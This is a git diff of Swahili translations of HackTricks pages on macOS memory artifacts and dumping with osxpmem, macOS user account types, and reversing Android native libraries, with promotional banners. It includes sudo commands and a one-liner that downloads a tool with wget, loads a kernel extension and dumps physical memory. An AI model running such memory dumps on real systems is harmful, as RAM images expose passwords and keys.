-Jifunze kuhusu udukuzi wa AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! +Jifunze kuhusu kuvamia AWS kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako inatangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi wa PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au **kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za udukuzi kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kuvamia kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md index 48feaa783..af421187d 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-files-folders-and-binaries/macos-memory-dumping.md @@ -1,42 +1,56 @@ -# Kupata Kumbukumbu za macOS +# Kudondosha Kumbukumbu za Kumbukumbu za macOS
-Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako inayotangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA USAJILI**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) ya kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa **huduma za bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za kuiba**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + ## Vitu vya Kumbukumbu ### Faili za Kubadilishana -Faili za kubadilishana, kama vile `/private/var/vm/swapfile0`, hutumika kama **hifadhi wakati kumbukumbu ya kimwili imejaa**. Wakati hakuna nafasi zaidi katika kumbukumbu ya kimwili, data yake hutiwa kwenye faili ya kubadilishana na kisha hurudishwa kwenye kumbukumbu ya kimwili kama inavyohitajika. Inaweza kuwepo faili nyingi za kubadilishana, zenye majina kama swapfile0, swapfile1, na kadhalika. +Faili za kubadilishana, kama vile `/private/var/vm/swapfile0`, hutumika kama **akiba wakati kumbukumbu ya kimwili imejaa**. Wakati hakuna nafasi zaidi katika kumbukumbu ya kimwili, data yake inahamishwa kwenye faili ya kubadilishana na kisha kurudishwa kwenye kumbukumbu ya kimwili kama inavyohitajika. Inaweza kuwepo faili nyingi za kubadilishana, zenye majina kama swapfile0, swapfile1, na kadhalika. -### Picha ya Kuhifadhi +### Picha ya Kulala -Faili iliyo katika eneo la `/private/var/vm/sleepimage` ni muhimu wakati wa **hali ya kulala**. **Data kutoka kwenye kumbukumbu huhifadhiwa kwenye faili hii wakati OS X inalala**. Wakati kompyuta inapoamka, mfumo unapata data ya kumbukumbu kutoka kwenye faili hii, kuruhusu mtumiaji kuendelea pale walipoishia. +Faili iliyoko kwenye `/private/var/vm/sleepimage` ni muhimu wakati wa **hali ya kulala**. **Data kutoka kumbukumbu inahifadhiwa kwenye faili hii wakati OS X inalala**. Wakati wa kuamsha kompyuta, mfumo unapata data ya kumbukumbu kutoka kwenye faili hii, kuruhusu mtumiaji kuendelea pale walipoishia. -Ni muhimu kufahamu kuwa kwenye mifumo ya MacOS ya kisasa, faili hii kwa kawaida imefichwa kwa sababu za usalama, hivyo kufanya kupona kuwa ngumu. +Ni muhimu kutambua kwamba kwenye mifumo ya MacOS ya kisasa, faili hii kawaida imefichwa kwa sababu za usalama, ikifanya kupona kuwa ngumu. -* Ili kuthibitisha ikiwa ufunuo umewezeshwa kwa sleepimage, amri `sysctl vm.swapusage` inaweza kutumika. Hii itaonyesha ikiwa faili imefichwa. +* Ili kuthibitisha ikiwa uchawi umewezeshwa kwa sleepimage, amri `sysctl vm.swapusage` inaweza kutumika. Hii itaonyesha ikiwa faili imefichwa. -### Kumbukumbu za Shinikizo la Kumbukumbu +### Kumbukumbu ya Shinikizo la Kumbukumbu -Faili nyingine muhimu inayohusiana na kumbukumbu kwenye mifumo ya MacOS ni **kumbukumbu ya shinikizo la kumbukumbu**. Kumbukumbu hizi ziko katika `/var/log` na zina habari za kina kuhusu matumizi ya kumbukumbu ya mfumo na matukio ya shinikizo la kumbukumbu. Zinaweza kuwa na manufaa hasa katika kutambua matatizo yanayohusiana na kumbukumbu au kuelewa jinsi mfumo unavyosimamia kumbukumbu kwa muda. +Faili nyingine muhimu inayohusiana na kumbukumbu kwenye mifumo ya MacOS ni **kumbukumbu ya shinikizo la kumbukumbu**. Kumbukumbu hizi ziko katika `/var/log` na zina habari za kina kuhusu matumizi ya kumbukumbu ya mfumo na matukio ya shinikizo. Zinaweza kuwa muhimu hasa kwa kugundua masuala yanayohusiana na kumbukumbu au kuelewa jinsi mfumo unavyosimamia kumbukumbu kwa muda. -## Kupata kumbukumbu kwa kutumia osxpmem +## Kudondosha kumbukumbu na osxpmem -Ili kupata kumbukumbu kwenye kifaa cha MacOS, unaweza kutumia [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip). +Ili kudondosha kumbukumbu kwenye kompyuta ya MacOS unaweza kutumia [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip). -**Note**: Maelekezo yafuatayo yatafanya kazi tu kwa Macs zenye muundo wa Intel. Zana hii sasa imehifadhiwa na toleo la mwisho lilikuwa mwaka 2017. Programu tumizi iliyopakuliwa kwa kutumia maelekezo yaliyotolewa hapa inalenga vifaa vya Intel kwani Apple Silicon haikuwepo mwaka 2017. Inaweza kuwa inawezekana kuunda programu tumizi kwa muundo wa arm64 lakini utalazimika kujaribu mwenyewe. +**Maelezo**: Maelekezo yafuatayo yatafanya kazi kwa Macs zenye muundo wa Intel tu. Zana hii sasa imehifadhiwa na toleo la mwisho lilikuwa mwaka 2017. Binari iliyopakuliwa kwa kutumia maelekezo yaliyotolewa inalenga chips za Intel kwani Apple Silicon haikuwepo mwaka 2017. Inaweza kuwa inawezekana kuchakata binari kwa muundo wa arm64 lakini utalazimika kujaribu mwenyewe. ```bash #Dump raw format sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem @@ -44,16 +58,16 @@ sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem #Dump aff4 format sudo osxpmem.app/osxpmem -o /tmp/dump_mem.aff4 ``` -Ikiwa utapata kosa hili: `osxpmem.app/MacPmem.kext haikufanikiwa kupakia - (libkern/kext) kushindwa kwa uthibitisho (umiliki wa faili/ruhusa); angalia magogo ya mfumo/kernel kwa makosa au jaribu kextutil(8)` Unaweza kulitatua kwa kufanya: +Ikiwa unapata kosa hili: `osxpmem.app/MacPmem.kext failed to load - (libkern/kext) authentication failure (file ownership/permissions); check the system/kernel logs for errors or try kextutil(8)` Unaweza kulitatua kwa kufanya: ```bash sudo cp -r osxpmem.app/MacPmem.kext "/tmp/" sudo kextutil "/tmp/MacPmem.kext" #Allow the kext in "Security & Privacy --> General" sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem ``` -**Makosa mengine** yanaweza kurekebishwa kwa **kuruhusu mzigo wa kext** katika "Usalama na Faragha --> Jumla", tu **ruhusu**. +**Makosa mengine** yanaweza kusuluhishwa kwa **kuruhusu mzigo wa kext** katika "Usalama & Faragha --> Jumla", tu **ruhusu**. -Unaweza pia kutumia **oneliner** hii kupakua programu, kupakia kext na kudump kumbukumbu: +Unaweza pia kutumia hii **oneliner** kupakua programu, kuruhusu kext na kudondosha kumbukumbu: {% code overflow="wrap" %} ```bash @@ -62,16 +76,28 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem- ``` {% endcode %} +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malwares za kuiba**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na programu hasidi za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} +
-Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)! +Jifunze AWS hacking kutoka sifuri hadi shujaa na htARTE (HackTricks AWS Red Team Expert)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kuhack kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
diff --git a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md index b1eceb2c7..280d4ebad 100644 --- a/macos-hardening/macos-security-and-privilege-escalation/macos-users.md +++ b/macos-hardening/macos-security-and-privilege-escalation/macos-users.md @@ -2,26 +2,40 @@
-Jifunze kuhusu kudukua AWS kutoka sifuri hadi bingwa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! +Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwenye** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) +* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github.
+## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** za kuangalia ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za kuiba taarifa. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + ### Watumiaji wa Kawaida -* **Daemon**: Mtumiaji aliyeandaliwa kwa ajili ya daemons ya mfumo. Majina ya akaunti za daemons ya chaguo-msingi kawaida huanza na "\_": +* **Daemon**: Mtumiaji aliyeandaliwa kwa ajili ya daemons za mfumo. Majina ya akaunti za daemons za chaguo-msingi kawaida huanza na "\_": ```bash _amavisd, _analyticsd, _appinstalld, _appleevents, _applepay, _appowner, _appserver, _appstore, _ard, _assetcache, _astris, _atsserver, _avbdeviced, _calendar, _captiveagent, _ces, _clamav, _cmiodalassistants, _coreaudiod, _coremediaiod, _coreml, _ctkd, _cvmsroot, _cvs, _cyrus, _datadetectors, _demod, _devdocs, _devicemgr, _diskimagesiod, _displaypolicyd, _distnote, _dovecot, _dovenull, _dpaudio, _driverkit, _eppc, _findmydevice, _fpsd, _ftp, _fud, _gamecontrollerd, _geod, _hidd, _iconservices, _installassistant, _installcoordinationd, _installer, _jabber, _kadmin_admin, _kadmin_changepw, _knowledgegraphd, _krb_anonymous, _krb_changepw, _krb_kadmin, _krb_kerberos, _krb_krbtgt, _krbfast, _krbtgt, _launchservicesd, _lda, _locationd, _logd, _lp, _mailman, _mbsetupuser, _mcxalr, _mdnsresponder, _mobileasset, _mysql, _nearbyd, _netbios, _netstatistics, _networkd, _nsurlsessiond, _nsurlstoraged, _oahd, _ondemand, _postfix, _postgres, _qtss, _reportmemoryexception, _rmd, _sandbox, _screensaver, _scsd, _securityagent, _softwareupdate, _spotlight, _sshd, _svn, _taskgated, _teamsserver, _timed, _timezone, _tokend, _trustd, _trustevaluationagent, _unknown, _update_sharing, _usbmuxd, _uucp, _warmd, _webauthserver, _windowserver, _www, _wwwproxy, _xserverdocs ``` -* **Guest**: Akaunti kwa wageni wenye ruhusa kali sana +* **Mgeni**: Akaunti kwa wageni wenye ruhusa kali {% code overflow="wrap" %} ```bash @@ -30,26 +44,12 @@ for i in "${state[@]}"; do sysadminctl -"${i}" status; done; ``` {% endcode %} -* **Hakuna mtu**: Mchakato unatekelezwa na mtumiaji huyu wakati idhini ndogo inahitajika +* **Hakuna mtu**: Mchakato unatekelezwa na mtumiaji huyu wakati idhini chache zinahitajika * **Root** -### Uwezo wa Mtumiaji +### Mamlaka ya Mtumiaji -* **Mtumiaji wa Kawaida**: Mtumiaji wa msingi kabisa. Mtumiaji huyu anahitaji idhini kutoka kwa mtumiaji wa admin wakati anajaribu kufunga programu au kutekeleza kazi zingine za juu. Hawawezi kufanya hivyo peke yao. -* **Mtumiaji wa Admin**: Mtumiaji ambaye kwa kawaida hufanya kazi kama mtumiaji wa kawaida lakini pia anaruhusiwa kufanya vitendo vya root kama vile kufunga programu na kazi zingine za utawala. Watumiaji wote wanaoingia kwenye kikundi cha admin wanapewa **upatikanaji wa root kupitia faili ya sudoers**. -* **Root**: Root ni mtumiaji anayeruhusiwa kufanya vitendo karibu vyovyote (kuna vizuizi vilivyowekwa na ulinzi kama System Integrity Protection). -* Kwa mfano, root hawezi kuweka faili ndani ya `/System` - -
- -Jifunze kuhusu kudukua AWS kutoka mwanzo hadi kuwa bingwa na htARTE (HackTricks AWS Red Team Expert)! - -Njia nyingine za kusaidia HackTricks: - -* Ikiwa unataka kuona **kampuni yako ikitangazwa kwenye HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**The PEASS Family**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa [**NFTs**](https://opensea.io/collection/the-peass-family) za kipekee -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. - -
+* **Mtumiaji wa Kawaida:** Msingi wa watumiaji. Mtumiaji huyu anahitaji idhini kutoka kwa mtumiaji wa usimamizi anapojaribu kufunga programu au kutekeleza kazi nyingine za juu. Hawawezi kufanya hivyo kwa kujitegemea. +* **Mtumiaji wa Usimamizi**: Mtumiaji ambaye kwa kawaida anafanya kazi kama mtumiaji wa kawaida lakini pia anaruhusiwa kutekeleza vitendo vya msingi kama vile kufunga programu na kazi nyingine za usimamizi. Wote wanaoingia kwenye kikundi cha usimamizi wanapewa **upatikanaji wa root kupitia faili ya sudoers**. +* **Root**: Root ni mtumiaji anayeruhusiwa kutekeleza karibu kitendo chochote (kuna vizuizi vilivyowekwa na ulinzi kama Ulinzi wa Uadilifu wa Mfumo). +* Kwa mfano root hataweza kuweka faili ndani ya `/System` diff --git a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index 3c1c6ee09..26263d5b8 100644 --- a/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -6,43 +6,57 @@ Njia nyingine za kusaidia HackTricks: -* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) +* Ikiwa unataka kuona **kampuni yako ikionekana kwenye HackTricks** au **kupakua HackTricks kwa PDF** Angalia [**MIPANGO YA KUJIUNGA**](https://github.com/sponsors/carlospolop)! +* Pata [**bidhaa rasmi za PEASS & HackTricks**](https://peass.creator-spring.com) * Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au kikundi cha [**telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** +* **Shiriki mbinu zako za kudukua kwa kuwasilisha PRs kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. +## WhiteIntel + +
+ +[**WhiteIntel**](https://whiteintel.io) ni injini ya utaftaji inayotumia **dark-web** ambayo inatoa huduma za **bure** kuchunguza ikiwa kampuni au wateja wake wameathiriwa na **malware za wizi**. + +Lengo kuu la WhiteIntel ni kupambana na utekaji wa akaunti na mashambulio ya ransomware yanayotokana na malware za wizi wa habari. + +Unaweza kutembelea tovuti yao na kujaribu injini yao **bure** kwa: + +{% embed url="https://whiteintel.io" %} + +--- + **Kwa habari zaidi angalia: [https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html](https://maddiestone.github.io/AndroidAppRE/reversing\_native\_libs.html)** -Programu za Android zinaweza kutumia maktaba za asili, kawaida zimeandikwa kwa C au C++, kwa kazi zenye utendaji mkubwa. Waundaji wa programu hasidi pia hutumia maktaba hizi, kwani ni ngumu kuzirekebisha kuliko kanuni ya DEX. Sehemu hii inasisitiza ujuzi wa kurekebisha nyuma uliozingatia Android, badala ya kufundisha lugha za mkutano. Toleo la ARM na x86 la maktaba linapatikana kwa utangamano. +Programu za Android zinaweza kutumia maktaba za asili, kwa kawaida zilizoandikwa kwa C au C++, kwa kazi za msingi za utendaji. Wabunifu wa programu hasidi pia hutumia maktaba hizi, kwani ni ngumu kuzigeuza kuliko bytecode ya DEX. Sehemu hii inasisitiza ujuzi wa kugeuza maktaba za asili zilizobinafsishwa kwa Android, badala ya kufundisha lugha za mkutano. Toleo la ARM na x86 la maktaba hutolewa kwa utangamano. ### Mambo Muhimu: - **Maktaba za Asili katika Programu za Android:** -- Hutumiwa kwa kazi zenye utendaji mkubwa. -- Zimeandikwa kwa C au C++, hivyo kurekebisha nyuma kunakuwa changamoto. -- Zinapatikana katika muundo wa `.so` (kitu kinachoshirikiwa), kama vile programu za Linux. -- Waundaji wa programu hasidi wanapendelea kanuni ya asili ili kufanya uchambuzi kuwa mgumu zaidi. +- Hutumiwa kwa kazi zenye mahitaji makubwa ya utendaji. +- Zimeandikwa kwa C au C++, hivyo kugeuza ni changamoto. +- Zinapatikana katika muundo wa `.so` (faili za kushirikishwa), sawa na programu za Linux. +- Wabunifu wa malware wanapendelea nambari za asili ili kufanya uchambuzi kuwa mgumu. -- **Java Native Interface (JNI) & Android NDK:** -- JNI inaruhusu njia za Java zitekelezwe kwa kutumia kanuni ya asili. -- NDK ni seti maalum ya zana za Android za kuandika kanuni ya asili. -- JNI na NDK hufanya mawasiliano kati ya kanuni ya Java (au Kotlin) na maktaba za asili. +- **Kiolesura cha Java Native (JNI) & NDK ya Android:** +- JNI inaruhusu njia za Java kutekelezwa kwa nambari za asili. +- NDK ni seti ya zana maalum ya Android kutunga nambari za asili. +- JNI na NDK hupitisha nambari za Java (au Kotlin) na maktaba za asili. - **Kupakia na Kutekeleza Maktaba:** - Maktaba hupakiwa kwenye kumbukumbu kwa kutumia `System.loadLibrary` au `System.load`. - JNI_OnLoad inatekelezwa wakati wa kupakia maktaba. -- Njia za asili zilizotangazwa katika Java zinaunganishwa na kazi za asili, kuruhusu utekelezaji. +- Njia za asili zilizotangazwa kwa Java zinahusishwa na kazi za asili, kuruhusu utekelezaji. - **Kuunganisha Njia za Java na Kazi za Asili:** -- **Unganishaji wa Kudumu:** Majina ya kazi katika maktaba za asili yanalingana na muundo maalum, kuruhusu kuunganisha moja kwa moja. -- **Unganishaji wa Stesheni:** Hutumia `RegisterNatives` kwa unganishaji, hutoa uwezo wa kubadilisha majina na muundo wa kazi. +- **Unganishaji wa Kudumu:** Majina ya kazi katika maktaba za asili yanalingana na muundo maalum, kuruhusu uunganishaji wa moja kwa moja. +- **Unganishaji wa Stesheni:** Hutumia `RegisterNatives` kwa uunganishaji, kutoa mabadiliko katika majina ya kazi na muundo. -- **Zana na Mbinu za Kurekebisha Nyuma:** +- **Zana na Mbinu za Kugeuza:** - Zana kama Ghidra na IDA Pro husaidia kuchambua maktaba za asili. -- `JNIEnv` ni muhimu kwa kuelewa kazi na mwingiliano wa JNI. -- Zoezi zinapatikana ili kujifunza kupakia maktaba, kuunganisha njia, na kutambua kazi za asili. +- `JNIEnv` ni muhimu kwa kuelewa njia za JNI na mwingiliano. +- Mazoezi yanatolewa kufanya mazoezi ya kupakia maktaba, kuunganisha njia, na kutambua kazi za asili. ### Vyanzo: - **Kujifunza Mkutano wa ARM:** @@ -54,19 +68,5 @@ Programu za Android zinaweza kutumia maktaba za asili, kawaida zimeandikwa kwa C - [Vidokezo vya JNI vya Android](https://developer.android.com/training/articles/perf-jni) - [Kuanza na NDK](https://developer.android.com/ndk/guides/) -- **Kurekebisha Nyuma Maktaba za Asili:** -- [Kurekebisha Nyuma Maktaba za Asili za Android Kwa Kutumia JEB Decompiler](https://medium.com/@shubhamsonani/how-to-debug-android-native-libraries-using-jeb-decompiler-eec681a22cf3) - -
- -Jifunze kuhusu kudukua AWS kutoka sifuri hadi shujaa na htARTE (Mtaalam wa Timu Nyekundu ya AWS ya HackTricks)! - -Njia nyingine za kusaidia HackTricks: - -* Ikiwa unataka kuona **kampuni yako inatangazwa katika HackTricks** au **kupakua HackTricks kwa muundo wa PDF** Angalia [**MPANGO WA KUJIUNGA**](https://github.com/sponsors/carlospolop)! -* Pata [**swag rasmi ya PEASS & HackTricks**](https://peass.creator-spring.com) -* Gundua [**Familia ya PEASS**](https://opensea.io/collection/the-peass-family), mkusanyiko wetu wa kipekee wa [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Jiunge na** πŸ’¬ [**Kikundi cha Discord**](https://discord.gg/hRep4RUj7f) au [**kikundi cha telegram**](https://t.me/peass) au **tufuate** kwenye **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.** -* **Shiriki mbinu zako za kudukua kwa kuwasilisha PR kwa** [**HackTricks**](https://github.com/carlospolop/hacktricks) na [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repos za github. - -
